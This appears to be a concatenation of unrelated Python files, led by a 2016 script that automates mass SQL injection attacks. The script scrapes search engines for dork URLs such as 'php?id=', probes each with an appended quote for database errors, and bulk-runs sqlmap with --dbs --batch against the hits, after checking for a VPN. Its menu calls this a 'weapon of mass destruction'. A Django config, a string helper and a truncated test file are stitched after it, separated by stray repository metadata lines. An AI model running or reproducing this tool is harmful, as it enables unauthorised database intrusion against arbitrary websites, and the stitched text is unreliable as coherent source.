    print(" prone to SQL injection, we'll catch this with some predefined error")
    print(" messages. The script will not add websites for blind SQL injections,")
    print(" due to the predefined error messages.")
    print("")
    print(bcolors.BOLD + " # Section 3" + bcolors.ENDC)
    print(" This is just an activation of sqlmap with the bulk argument and no")
    print(" user interaction for validation of SQL injection.")
    print("")
    print("\n")
    print(bcolors.BOLD + " Stay safe and help the vulnerables" + bcolors.ENDC)
    print("\n")
    sys.exit()
def checkConnection():
# Header request for net connectivity
print(bcolors.ENDC + "\n [*] Checking network connection" + bcolors.ENDC)
conn = http.client.HTTPConnection("www.microsoft.com", 80)
try:
conn.request("HEAD", "/")
print(bcolors.OKGREEN + " [+] Network connection seems OK" + bcolors.ENDC)
except:
print(bcolors.FAIL + " [-] Network connection seems down" + bcolors.ENDC)
# Checking for tun0 or ppp
print(bcolors.ENDC + " [*] Checking VPN connection" + bcolors.ENDC)
if re.match(r'tun.', 'tun') or re.match(r'ppp.', 'ppp') not in psutil.net_if_addrs():
print(bcolors.WARNING + " [-] No indication of a VPN connection on tun or ppp found.")
choice = input(bcolors.ENDC + " Continue (y/N): " + bcolors.OKBLUE)
if choice.lower() == "y":
print(bcolors.ENDC + " ")
else:
sys.exit()
else:
print(bcolors.OKGREEN + " [+] Indications of a VPN. Good. Will continue." + bcolors.ENDC)
startpage()
def startpage():
print("\n")
print(bcolors.BOLD + " Please choose your weapon of mass destruction:")
print(bcolors.BOLD + " 1" + bcolors.ENDC + " - Scrape the web for possible vuln urls")
print(bcolors.BOLD + " 2" + bcolors.ENDC + " - Check the urls for vulnerabilities")
print(bcolors.BOLD + " 3" + bcolors.ENDC + " - Bulk exploit urls with sqlmap")
print(bcolors.BOLD + " 4" + bcolors.ENDC + " - Help me")
print("\n")
# @type choice: str
# @param choice: Weapon of massdestruction
choice = input(bcolors.ENDC + " Enter choice numer (1, 2, 3, 4): " + bcolors.OKBLUE)
if not choice.isdigit():
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice not in ('1', '2', '3', '4'):
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice == "1":
inputSearchUrls()
elif choice == "2":
checkUrlsForVuln(filenameRawUrl)
elif choice == "3":
scanUrlsSQLmap(filenameVulnUrl)
elif choice == "4":
helpme()
def main():
os.system('clear')
print("\n\n")
print(" _____ __ _____ ____ __ _ _ __ _ ")
print(" / __(_)___ ____/ / / ___// __ \ / / (_)___ (_)__ _____/ /_(_)___ ____ ")
print(" / /_/ / __ \/ __ / \__ \/ / / / / / / / __ \ / / _ \/ ___/ __/ / __ \/ __ |")
print(" / __/ / / / / /_/ / ___/ / /_/ / / /___ / / / / / / / __/ /__/ /_/ / /_/ / / / /")
print(" /_/ /_/_/ /_/\__,_/ /____/\___\_\/_____/ /_/_/ /_/_/ /\___/\___/\__/_/\____/_/ /_/ ")
print(" /___/ ")
print("\n\n")
checkConnection()
# GO GO GO
main()
| 46.040419
| 206
| 0.497773
|
# Run sqlmap against urls
#
# License:
# MIT - (c) 2016 ThomasTJ (TTJ)
#
import sys # Quit the shiat
import os # Working with files and starting sqlmap
import re # Searching web results for vuln
import requests # Calling websites
import urllib.parse # Parsing url encoding for search
import shutil # Checking if SQLmap is installed
import psutil # Checking possible VPN connection
import http.client # Ping to check network connection
import random # Shuffle between user agents
import time # Printing time when scraping and checking urls
from time import sleep # Multiple use cases, e.g. sleep between requests
from bs4 import BeautifulSoup # Working with website date
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ITALIC = '\x1B[3m'
# Variables which needs to be defined
filenameRawUrl = "0"
filenameVulnUrl = "0"
def LoadUserAgents(uafile="user_agents.txt"):
# uafile : string, path to text file of user agents, one per line
uas = []
with open(uafile, 'rb') as uaf:
for ua in uaf.readlines():
if ua:
uas.append(ua.strip()[1:-1-1])
random.shuffle(uas)
return uas
def inputSearchUrls():
print("\n" + bcolors.HEADER)
print(" #===================================#")
print(" # #")
print(" # Find urls which might is vuln for #")
print(" # SQL injections #")
print(" # #")
print(" #===================================#")
print("\n" + bcolors.ENDC)
print(" Basesearch could be: php?id=, php?cat=, e.g.\n")
# =================================
# Base input
# =================================
# @type basesearch: str
# @param basesearch: Query string. Must NOT be url-encoded.
basesearch = input(" Enter base search string: " + bcolors.OKBLUE)
# @type searchprovider: str
# @param searchprovider: Who should perform the search.
searchprovider = input(bcolors.ENDC + " Bing or Google (b/g): " + bcolors.OKBLUE)
if searchprovider.lower() not in ('b', 'g'):
print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
searchprovider = 'b'
# @type maxperpage: int/str (changed to string)
# @param maxperpage: Max results returned per page
maxperpage = input(bcolors.ENDC + " Results per page: " + bcolors.OKBLUE)
if not maxperpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 20")
maxperpage = 20
# @type maxpages: int
# @param maxpages: Max pages to loop through
maxpages = input(bcolors.ENDC + " Number of pages: " + bcolors.OKBLUE)
if not maxpages.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 10")
maxpages = 10
# @type startpage: int
# @param startpage: First page to look in
startpage = input(bcolors.ENDC + " Start pages: " + bcolors.OKBLUE)
if not startpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
startpage = 0
if int(startpage) > 0:
startpage = (int(startpage) - 1)
# @type timeout: int
# @param timeout: Sleep between request
timeout = input(bcolors.ENDC + " Enter pause between requests: " + bcolors.OKBLUE)
if not timeout.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 6")
timeout = 6
# @type savesearch: str
# @param savesearch: Save the shiat to a file
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'n'")
savesearch = 'n'
# @type filename: str
# @param filename: Filename for file containing the search results
if savesearch.lower() == "y":
filename = input(bcolors.ENDC + " Filename for search: " + bcolors.OKBLUE)
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(bcolors.WARNING + " - User disallowed appending to resultfile")
print(bcolors.WARNING + " - Please try again with another filename")
print(bcolors.WARNING + " - Exiting")
sys.exit()
else:
filename = ""
filename = "tmpurllist"
# =================================
# Make variables ready to use
# =================================
count = str(maxperpage)
startpage = int(startpage)
pages = (int(maxpages) + startpage)
sleeptime = int(timeout)
string = str(basesearch)
stringurl = urllib.parse.quote_plus(string)
print(bcolors.ENDC + "\n [*]:: Searching")
print(bcolors.HEADER + bcolors.BOLD + "\n" + " [+] Results" + bcolors.ENDC)
searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename)
def searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename):
# =================================
# Loop through pages
# =================================
for start in range(startpage, pages):
# try:
# =========================
# Bing search
# =========================
if searchprovider == "b":
pagenr = int(start)*int(count)+1
address = "http://www.bing.com/search?q=instreamset:(url title):" + stringurl + "&count=" + count + "&first=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('h2'):
for a in d.find_all('a', href=True):
if string in a['href']:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + a['href'] + bcolors.ENDC
)
if filename:
with open(filename, 'a') as file:
file.write(a['href'] + "\n")
elif "0.r.msn." in a['href']:
pass
else:
pass
sleep(sleeptime)
# =========================
# Google search
# =========================
elif searchprovider == "g":
pagenr = int(start)*int(count)
address = "https://www.google.dk/search?q=" + stringurl + "&num=" + count + "&start=" + str(pagenr)
# address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('cite'):
url = d.text
if string in url:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + url + bcolors.ENDC
)
if filename == "y":
with open(filename, 'a') as file:
file.write(url + "\n")
sleep(sleeptime)
try:
print("")
# =============================
# Error, end, exit
# =============================
except KeyboardInterrupt:
print(bcolors.FAIL + " User input - Ctrl + c" + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
except:
print(bcolors.FAIL + " ERROR!!! " + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scraping")
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
if savesearch == "y":
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
else:
print(" Total urls collected: " + str(resultsnumber))
# Check urls? Next function activates..
checkurls = input(bcolors.ENDC + "\n Would you like to check urls for vuln (Y/n): " + bcolors.OKBLUE)
if checkurls.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
checkurls = "y"
if checkurls == "n":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
checkUrlsForVuln(filename)
def checkUrlsForVuln(filenameRawUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Check if urls is vuln for #")
print(" # SQL injection #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Base input
# =================================
# Base input
if filenameRawUrl != "0":
print(" Filepath from run is still in memory: " + filenameRawUrl)
urlfileChoose = input(bcolors.ENDC + " (i)nput new filename, or (u)se from memory (i/U): " + bcolors.OKBLUE)
if urlfileChoose not in ('i', 'u'):
print(bcolors.WARNING + " - Using from memory")
urlfileChoose = 'u'
if urlfileChoose == 'u':
urlfile = filenameRawUrl
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(urlfile):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
# @type verboseactive: str
# @param verboseactive: Verboselevel.
verboseactive = input(bcolors.ENDC + " Verboselevel (0, 1, 2): " + bcolors.OKBLUE)
if not verboseactive:
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
verboseactive = "0"
# @type savesearch: str
# @param savesearch: Save the scan to file.
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
savesearch = 'y'
# @type filename: str
# @param filename: Filename for the shiat.
if savesearch == "y":
filename = input(bcolors.ENDC + " Filename for results: " + bcolors.OKBLUE)
if not filename:
print(bcolors.WARNING + " - Wrong input - using 'vulnurls' as filename")
filename = "vulnurls"
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(" User disallowed appending to resultfile")
print(" Please try again with another filename")
print(" Exiting")
sys.exit()
else:
filename = "0"
print(bcolors.ENDC + "\n [*]::Reading file\n")
print(" [*] Connecting\n")
# =================================
# Loop through urls and add a qoute
# =================================
with open(urlfile) as fileorg:
for line in fileorg:
checkMY1 = 0
checkMY2 = 0
checkMY3 = 0
checkMY4 = 0
checkMS1 = 0
checkMS2 = 0
checkMS3 = 0
checkOR1 = 0
checkOR2 = 0
checkOR3 = 0
checkPO1 = 0
checkPO2 = 0
try:
# Get data
url = line + "'"
print(
" ["
+ time.strftime("%H:%M:%S")
+ "] [*] " + line.strip('\n')
)
uas = LoadUserAgents()
ua = random.choice(uas)
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
checkMY1 = len(soup.find_all(text=re.compile('check the manual that corresponds to your MySQL')))
checkMY2 = len(soup.find_all(text=re.compile('SQL syntax')))
checkMY3 = len(soup.find_all(text=re.compile('server version for the right syntax')))
checkMY4 = len(soup.find_all(text=re.compile('expects parameter 1 to be')))
checkMS1 = len(soup.find_all(text=re.compile('Unclosed quotation mark before the character string')))
checkMS2 = len(soup.find_all(text=re.compile('An unhanded exception occurred during the execution')))
checkMS3 = len(soup.find_all(text=re.compile('Please review the stack trace for more information')))
checkOR1 = len(soup.find_all(text=re.compile('java.sql.SQLException: ORA-00933')))
checkOR2 = len(soup.find_all(text=re.compile('SQLExceptionjava.sql.SQLException')))
checkOR3 = len(soup.find_all(text=re.compile('quoted string not properly terminated')))
checkPO1 = len(soup.find_all(text=re.compile('Query failed:')))
checkPO2 = len(soup.find_all(text=re.compile('unterminated quoted string at or near')))
if verboseactive == "1":
print(" [V] Check1 MySQL found: " + str(checkMY1))
print(" [V] Check2 MySQL found: " + str(checkMY2))
print(" [V] Check3 MySQL found: " + str(checkMY3))
print(" [V] Check4 MySQL found: " + str(checkMY4))
print(" [V] Check5 MS SQL found: " + str(checkMS1))
print(" [V] Check6 MS SQL found: " + str(checkMS2))
print(" [V] Check7 MS SQL found: " + str(checkMS3))
print(" [V] Check8 Oracle found: " + str(checkOR1))
print(" [V] Check9 Oracle found: " + str(checkOR2))
print(" [V] Check10 Oracle found: " + str(checkOR3))
print(" [V] Check11 Postgre found: " + str(checkPO1))
print(" [V] Check12 Postgre found: " + str(checkPO2))
if verboseactive == "2":
checkverMY1 = soup.find(text=re.compile('check the manual that corresponds to your MySQL'))
checkverMY2 = soup.find(text=re.compile(r'SQL syntax'))
checkverMY3 = soup.find(text=re.compile(r'server version for the right syntax'))
checkverMY4 = soup.find(text=re.compile('expects parameter 1 to be'))
print(" [V] Check1 MySQL found: " + str(checkverMY1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check2 MySQL found: " + str(checkverMY2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check3 MySQL found: " + str(checkverMY3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check4 MySQL found: " + str(checkverMY4).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverMS1 = soup.find(text=re.compile('Unclosed quotation mark before the character string'))
checkverMS2 = soup.find(text=re.compile('An unhanded exception occurred during the execution'))
checkverMS3 = soup.find(text=re.compile('Please review the stack trace for more information'))
print(" [V] Check5 MS SQL found: " + str(checkverMS1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check6 MS SQL found: " + str(checkverMS2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check7 MS SQL found: " + str(checkverMS3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverOR1 = soup.find(text=re.compile('java.sql.SQLException: ORA-00933'))
checkverOR2 = soup.find(text=re.compile('SQLExceptionjava.sql.SQLException'))
checkverOR3 = soup.find(text=re.compile('quoted string not properly terminated'))
print(" [V] Check8 Oracle found: " + str(checkverOR1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check9 Oracle found: " + str(checkverOR2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check10 Oracle found: " + str(checkverOR3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverPO1 = soup.find(text=re.compile('Query failed:'))
checkverPO2 = soup.find(text=re.compile('unterminated quoted string at or near'))
print(" [V] Check11 Postgre found: " + str(checkverPO1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check12 Postgre found: " + str(checkverPO2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
if (checkMY1 > 0 or checkMY2 > 0 or checkMY3 > 0 or checkMY4 > 0 or checkMS1 > 0 or checkMS2 > 0 or checkMS3 > 0 or checkOR1 > 0 or checkOR2 > 0 or checkOR3 > 0 or checkPO1 > 0 or checkPO2):
print(
bcolors.OKGREEN
+ "\n"
+ " Possible vuln url!"
+ "\n"
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] "
+ line + bcolors.ENDC
+ "\n"
)
if savesearch == "y":
with open(filename, 'a') as file:
file.write(line)
else:
print(
bcolors.WARNING
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [-] " + line + bcolors.ENDC
)
except KeyboardInterrupt:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
except:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
print("\n Done scanning urls")
if savesearch == "y":
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
if resultsnumber == 0:
print(" No vuln urls, exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
checkurls = input(bcolors.ENDC + "\n Would you like to run the urls through sqlmap (y/N): " + bcolors.OKBLUE)
if checkurls == "y":
try:
os.remove("tmpurllist")
except OSError:
pass
scanUrlsSQLmap(filename)
else:
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
def scanUrlsSQLmap(filenameVulnUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Scan urls with #")
print(" # SQLmap #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
if shutil.which('sqlmap') is None:
print(" SQLmap is not installed on system - can't go on.")
print(" Install sqlmap and run command below (sudo pacman -S sqlmap, sudo apt-get install sqlmap, etc.)")
print(" \nCommand:")
print(" sqlmap -m \"" + filenameVulnUrl + "\n")
else:
if filenameVulnUrl == "0":
print(" No filename in memory, please specify.")
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
filenameVulnUrl = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(filenameVulnUrl):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
print(bcolors.ENDC + " SQLmap will be started with arguments dbs, batch, random-agent, 4xthreads.")
fileDestination = (os.getcwd() + "/" + filenameVulnUrl)
command = ('sqlmap -m ' + fileDestination + " --dbs --batch --random-agent --threads 4")
print("Command to execute: " + command)
input(bcolors.ENDC + " Press enter to continue\n")
print(bcolors.ENDC + " Starting SQLmap - follow onscreen instructions")
print(bcolors.BOLD + " Press Ctrl + c to exit\n\n\n")
# RUN SQLMAP !!
os.system(command)
# Not implemented - specify saving destination
# @type savingplace: str
# @param savingplace: Who should perform the search.
# savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE)
# if savingplace not in ('b', 'g'):
# print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
# savingplace = 'b'
def helpme():
print("\n\n" + bcolors.HEADER)
print(" .---. .---. .-''-. .---. .-------. ,---. ,---. .-''-. ")
print(" | | |_ _| .'_ _ \ | ,_| \ _(`)_ \ | \ / | .'_ _ \ ")
print(" | | ( ' ) / ( ` ) ',-./ ) | (_ o._)| | , \/ , | / ( ` ) ' ")
print(" | '-(_{;}_). (_ o _) |\ '_ '`) | (_,_) / | |\_ /| |. (_ o _) | ")
print(" | (_,_) | (_,_)___| > (_) ) | '-.-' | _( )_/ | || (_,_)___| ")
print(" | _ _--. | ' \ .---.( . .-' | | | (_ o _) | |' \ .---. ")
print(" |( ' ) | | \ `-' / `-'`-'|___ | | | (_,_) | | \ `-' / ")
print(" (_{;}_)| | \ / | \/ ) | | | | \ / ")
print(" '(_,_) '---' `'-..-' `--------``---' '--' '--' `'-..-' ")
print("\n\n" + bcolors.ENDC)
print(" This python script is developed to show, how many vulnerables websites,")
print(" which are laying around on the web. The main focus of the script is to")
print(" generate a list of vuln urls. Please use the script with causing and")
print(" alert the webadmins of vulnerable pages. The SQLmap implementation is")
print(" just for showcasing.")
print("")
print(" The script is divided into 3 main sections.\n")
print(bcolors.BOLD + " # Section 1" + bcolors.ENDC)
print(" In this section you have to provide a search string, which 'connects' to")
print(" the websites database, e.g. 'php?id='. The script then crawls")
print(" Bing or Google for urls containing it. All of the urls can then be saved")
print(" into a file. (Please be aware that you might get banned for crawling to")
print(" fast, remember an appropriate break/sleep between request).")
print(bcolors.ITALIC + " Example of searchs: php?bookid=, php?idproduct=, php?bookid=, php?catid=,")
print(" php?action=, php?cart_id=, php?title=, php?itemid=" + bcolors.ENDC)
print("")
print(bcolors.BOLD + " # Section 2" + bcolors.ENDC)
print(" This section adds a qoute ' to the websites url. If the website is")
print(" prone to SQL injection, we'll catch this with some predefined error")
print(" messages. The script will not add websites for blind SQL injections,")
print(" due to the predefined error messages.")
print("")
print(bcolors.BOLD + " # Section 3" + bcolors.ENDC)
print(" This is just an activation of sqlmap with the bulk argument and no")
print(" user interaction for validation of SQL injection.")
print("")
print("\n")
print(bcolors.BOLD + " Stay safe and help the vulnerables" + bcolors.ENDC)
print("\n")
sys.exit()
def checkConnection():
# Header request for net connectivity
print(bcolors.ENDC + "\n [*] Checking network connection" + bcolors.ENDC)
conn = http.client.HTTPConnection("www.microsoft.com", 80)
try:
conn.request("HEAD", "/")
print(bcolors.OKGREEN + " [+] Network connection seems OK" + bcolors.ENDC)
except:
print(bcolors.FAIL + " [-] Network connection seems down" + bcolors.ENDC)
# Checking for tun0 or ppp
print(bcolors.ENDC + " [*] Checking VPN connection" + bcolors.ENDC)
if re.match(r'tun.', 'tun') or re.match(r'ppp.', 'ppp') not in psutil.net_if_addrs():
print(bcolors.WARNING + " [-] No indication of a VPN connection on tun or ppp found.")
choice = input(bcolors.ENDC + " Continue (y/N): " + bcolors.OKBLUE)
if choice.lower() == "y":
print(bcolors.ENDC + " ")
else:
sys.exit()
else:
print(bcolors.OKGREEN + " [+] Indications of a VPN. Good. Will continue." + bcolors.ENDC)
startpage()
def startpage():
print("\n")
print(bcolors.BOLD + " Please choose your weapon of mass destruction:")
print(bcolors.BOLD + " 1" + bcolors.ENDC + " - Scrape the web for possible vuln urls")
print(bcolors.BOLD + " 2" + bcolors.ENDC + " - Check the urls for vulnerabilities")
print(bcolors.BOLD + " 3" + bcolors.ENDC + " - Bulk exploit urls with sqlmap")
print(bcolors.BOLD + " 4" + bcolors.ENDC + " - Help me")
print("\n")
# @type choice: str
# @param choice: Weapon of massdestruction
choice = input(bcolors.ENDC + " Enter choice numer (1, 2, 3, 4): " + bcolors.OKBLUE)
if not choice.isdigit():
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice not in ('1', '2', '3', '4'):
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice == "1":
inputSearchUrls()
elif choice == "2":
checkUrlsForVuln(filenameRawUrl)
elif choice == "3":
scanUrlsSQLmap(filenameVulnUrl)
elif choice == "4":
helpme()
def main():
os.system('clear')
print("\n\n")
print(" _____ __ _____ ____ __ _ _ __ _ ")
print(" / __(_)___ ____/ / / ___// __ \ / / (_)___ (_)__ _____/ /_(_)___ ____ ")
print(" / /_/ / __ \/ __ / \__ \/ / / / / / / / __ \ / / _ \/ ___/ __/ / __ \/ __ |")
print(" / __/ / / / / /_/ / ___/ / /_/ / / /___ / / / / / / / __/ /__/ /_/ / /_/ / / / /")
print(" /_/ /_/_/ /_/\__,_/ /____/\___\_\/_____/ /_/_/ /_/_/ /\___/\___/\__/_/\____/_/ /_/ ")
print(" /___/ ")
print("\n\n")
checkConnection()
# GO GO GO
main()
| true
| true
|
790c945b942734c8447cae4a5be22ceb46f4e28d
| 95
|
py
|
Python
|
SimpleNews/apps.py
|
cww97/newsChain
|
1243c47176ddfa680a69da0d325056698b11ad59
|
[
"WTFPL"
] | null | null | null |
SimpleNews/apps.py
|
cww97/newsChain
|
1243c47176ddfa680a69da0d325056698b11ad59
|
[
"WTFPL"
] | 2
|
2020-04-30T14:43:42.000Z
|
2020-07-19T14:37:34.000Z
|
SimpleNews/apps.py
|
cww97/newsChain
|
1243c47176ddfa680a69da0d325056698b11ad59
|
[
"WTFPL"
] | null | null | null |
from django.apps import AppConfig
class SimplenewsConfig(AppConfig):
    """Django application configuration for the SimpleNews app."""
    # App name registered with Django's app registry (see Django AppConfig docs).
    name = 'SimpleNews'
| 15.833333
| 34
| 0.768421
|
from django.apps import AppConfig
class SimplenewsConfig(AppConfig):
name = 'SimpleNews'
| true
| true
|
790c951b07f4f5575656be117cc473bed050b786
| 501
|
py
|
Python
|
utils.py
|
domorelivelonger/rss-telegram-bot
|
c1bc3b2c9219eaeb4daa186874675128ee5386af
|
[
"MIT"
] | 1
|
2021-08-31T16:52:46.000Z
|
2021-08-31T16:52:46.000Z
|
utils.py
|
domorelivelonger/rss-telegram-bot
|
c1bc3b2c9219eaeb4daa186874675128ee5386af
|
[
"MIT"
] | null | null | null |
utils.py
|
domorelivelonger/rss-telegram-bot
|
c1bc3b2c9219eaeb4daa186874675128ee5386af
|
[
"MIT"
] | null | null | null |
# Get substring using 'start' and 'end' position.
def get_substring_or_empty(data, start, end=''):
    """Return the stripped text found between *start* and *end* in *data*.

    An empty *start* means "from the beginning of the string"; an empty
    *end* (the default) means "through the end of the string". Returns ''
    when *start* is absent from *data*, or *end* is absent from the part
    of *data* that follows the first occurrence of *start*.
    """
    if start not in data:
        return ''
    # Drop everything up to and including the first occurrence of start.
    # str.partition rejects an empty separator, so treat '' as "keep all".
    remainder = data.partition(start)[2] if start else data
    if end not in remainder:
        return ''
    # Keep everything before the first occurrence of end within the remainder.
    captured = remainder.partition(end)[0] if end else remainder
    return captured.strip()
| 20.04
| 49
| 0.447106
|
def get_substring_or_empty(data, start, end=''):
if start in data:
if '' == start:
f = 0
else:
f = len(start)
f = data.find(start) + f
data = data[f:]
else:
return ''
if end in data:
if '' == end:
f = len(data)
else:
f = data.find(end)
data = data[:f]
else:
return ''
data = data.strip()
return data
| true
| true
|
790c95727d163da9103c29441e784b656b234fcd
| 4,274
|
py
|
Python
|
tests/integration/benchmark_runner/common/oc/test_oc_without_operator.py
|
RobertKrawitz/benchmark-runner
|
671fd638ba139d74a3356673ad27b78b35a6a66a
|
[
"Apache-2.0"
] | 10
|
2021-07-21T21:44:20.000Z
|
2022-02-24T22:01:13.000Z
|
tests/integration/benchmark_runner/common/oc/test_oc_without_operator.py
|
RobertKrawitz/benchmark-runner
|
671fd638ba139d74a3356673ad27b78b35a6a66a
|
[
"Apache-2.0"
] | 83
|
2021-07-20T14:37:44.000Z
|
2022-03-24T13:48:04.000Z
|
tests/integration/benchmark_runner/common/oc/test_oc_without_operator.py
|
RobertKrawitz/benchmark-runner
|
671fd638ba139d74a3356673ad27b78b35a6a66a
|
[
"Apache-2.0"
] | 6
|
2021-07-14T21:12:48.000Z
|
2022-02-15T12:48:27.000Z
|
# Tests that are not required benchmark-operator pod
from benchmark_runner.common.oc.oc import OC
from tests.integration.benchmark_runner.test_environment_variables import *
import tempfile
import tarfile
import time
from benchmark_runner.common.prometheus.prometheus_snapshot import PrometheusSnapshot
def test_oc_get_ocp_server_version():
    """Log in to the cluster and verify the OCP server version is reported."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    assert client.get_ocp_server_version()
def test_oc_get_kata_version():
    """Log in and verify the sandboxed-containers (kata) version is reported."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    assert client.get_kata_version()
def test_oc_get_cnv_version():
    """Log in and verify the CNV operator version is reported."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    assert client.get_cnv_version()
def test_oc_get_ocs_version():
    """Log in and verify the OCS version is reported."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    assert client.get_ocs_version()
def test_oc_get_master_nodes():
    """Log in and verify the master-node list is non-empty."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    assert client.get_master_nodes()
def test_login():
    """Verify that logging in with the kubeadmin password succeeds."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    assert client.login()
def test_oc_get_pod_name():
    """Verify that looking up a nonexistent pod yields an empty name."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    missing = client._get_pod_name(pod_name='erererer', namespace=test_environment_variable['namespace'])
    assert missing == ''
def test_oc_get_pods():
